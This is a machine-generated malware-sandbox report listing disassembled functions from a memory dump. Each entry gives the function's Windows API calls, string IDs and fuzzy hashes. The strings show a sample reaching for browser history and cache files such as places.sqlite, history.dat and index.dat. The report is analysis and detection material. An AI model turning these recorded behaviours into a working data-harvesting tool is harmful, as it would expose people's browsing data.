                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                    Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                                                                                    • String ID: $$8
                                                                                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                    Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E3EC
                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1979745280-0
                                                                                                                                                                                    • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                    Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1355100292-0
                                                                                                                                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                    Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                                                                                    • API String ID: 2641622041-467022611
                                                                                                                                                                                    • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                    Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 839530781-0
                                                                                                                                                                                    • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID: *.*$index.dat
                                                                                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                    Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1156039329-0
                                                                                                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                    Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                    Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandleSleep
                                                                                                                                                                                    • String ID: }A
                                                                                                                                                                                    • API String ID: 252777609-2138825249
                                                                                                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                    Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                    • free.MSVCRT ref: 00409A31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                    • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                    Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                    • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                    Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: BINARY
                                                                                                                                                                                    • API String ID: 2221118986-907554435
                                                                                                                                                                                    • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                    • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                    Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                                                                                    • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                    Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                    Memory Dump Source
